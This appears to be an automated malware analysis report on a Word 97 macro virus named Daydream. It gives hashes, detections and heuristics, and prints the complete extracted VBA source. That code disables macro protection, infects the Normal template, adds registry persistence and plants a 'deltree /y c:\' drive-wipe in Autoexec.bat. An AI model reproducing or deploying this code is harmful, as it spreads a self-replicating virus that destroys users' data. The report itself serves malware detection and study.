Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 419985b9595f4931…

MALICIOUS

Office (OLE)

Size: 41.0 KB
Created: 1999-05-27 19:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a55342c51378427fb3b1152d0ab17c54
SHA-1: ee406c0168ec6b62040a7aeeb27223388c219cf6
SHA-256: 419985b9595f4931077bdb1949e1e4a6bb6d367543dab6c8caa35f3c2d224f96
Risk Score: 316

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample contains VBA macros that execute on document close (AutoClose) and document open (Document_Open). The AutoClose macro writes the value C:\WINDOWS\SYSTEM\Daydream.vbs under the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, establishing persistence, and exports its own code module to C:\WINDOWS\SYSTEM\Daydream.dll. It then writes a VBScript file to C:\WINDOWS\SYSTEM\Daydream.vbs which, when run, automates Word to turn off macro virus protection, hide the Tools > Macro menu entry, and replace the NormalTemplate's code module with the contents of C:\WINDOWS\SYSTEM\Daydream.sys, a file the macro also writes. The extracted source additionally registers a second Run value ("Subsystem") pointing at C:\WINDOWS\SYSTEM\32bitemu.vbs, a script that writes a "deltree /y c:\" line to C:\Autoexec.bat if Daydream.vbs is missing, and sets BootGUI=0 in C:\Msdos.sys.

Heuristics 8

  • Raw OLE macro text shows self-replication or security tampering (critical, OLE_RAW_MACRO_SELF_REPLICATION)
    OLE streams contain macro source text with auto-run entry points, CreateObject automation, CodeModule AddFromString/InsertLines/DeleteLines behavior, and Outlook or macro-security tampering. This is high-confidence macro-virus behavior even when oletools does not recover a standard VBA project.
  • ClamAV: Doc.Trojan.Lys-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Lys-1
  • Reference to Windows Script Host (high, SC_STR_WSCRIPT)
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched lines in script:
    Open "C:\WINDOWS\SYSTEM\Daydream.vbs" For Output As #1
    Print #1, "Set Daydream = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
    Print #1, "Daydream.Options.VirusProtection = (0 - 0):Daydream.Options.SaveNormalPrompt = (1 - 1):Daydream.Options.ConfirmConversions = (2 - 2)"
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched lines in script:
    Open "C:\WINDOWS\SYSTEM\Daydream.sys" For Output As #1
    Print #1, "Private Sub Document_Open()"
    Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
  • Auto_Close macro (low, OLE_VBA_AUTOCLOSE)
    Matched lines in script:
    Attribute VB_Customizable = True
    Sub AutoClose()
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "") = "C:\WINDOWS\SYSTEM\Daydream.vbs"
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3550 bytes
SHA-256: 35376664ac8af37ab0f91ac80494de3083f69d6cec98945d42e482aa49b05ba6
Detection: ClamAV: Doc.Trojan.Lys-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "") = "C:\WINDOWS\SYSTEM\Daydream.vbs"
ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\Daydream.dll")
Open "C:\WINDOWS\SYSTEM\Daydream.vbs" For Output As #1
Print #1, "Set Daydream = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Daydream.Options.VirusProtection = (0 - 0):Daydream.Options.SaveNormalPrompt = (1 - 1):Daydream.Options.ConfirmConversions = (2 - 2)"
Print #1, "Daydream.CommandBars(" & Chr(34) & "Tools" & Chr(34) & ").Controls(" & Chr(34) & "Macro" & Chr(34) & ").Visible = (3 - 3)"
Print #1, "For x = 1 To Daydream.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
Print #1, "Daydream.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"
Print #1, "Next"
Print #1, "Daydream.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Daydream.sys" & Chr(34) & ")"
Print #1, "Daydream.Application.Quit"
Close #1
Open "C:\WINDOWS\SYSTEM\Daydream.sys" For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = 1 to ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Daydream.dll" & Chr(34) & ")"
Print #1, "For x = 1 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
Print #1, "If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find(" & Chr(34) & "Private Sub Document_Close()" & Chr(34) & ", 1, 1, 1, 30, True, True, True) = False Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"
Print #1, "Next"
Print #1, "End Sub"
Close #1
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Subsystem") = "C:\WINDOWS\SYSTEM\32bitemu.vbs"
Open "C:\WINDOWS\SYSTEM\32bitemu.vbs" For Output As #1
Print #1, "Set A = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
Print #1, "If (A.FileExists(" & Chr(34) & "C:\WINDOWS\SYSTEM\Daydream.vbs" & Chr(34) & ")) = False Then"
Print #1, "Set B = A.CreateTextFile(" & Chr(34) & "C:\Autoexec.bat" & Chr(34) & ", True)"
Print #1, "B.WriteLine (" & Chr(34) & "@deltree /y c:\ > NUL" & Chr(34) & ")"
Print #1, "B.Close"
Print #1, "End If"
Close #1
If Day(15) Then
SetAttr "C:\Msdos.sys", vbNormal
System.PrivateProfileString("C:\Msdos.sys", "Options", "BootGUI") = "0"
SetAttr "C:\Msdos.sys", vbSystem + vbHidden + vbReadOnly
End If
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find("Sub AutoClose()", 1, 1, 1, 15, True, True, True) = True Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Private Sub Document_Close()"
Else: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Sub AutoClose()"
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
'.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.
' Daydream(Fantasy) By Lys KovicK
';';';';';';';';';';';';';';';';';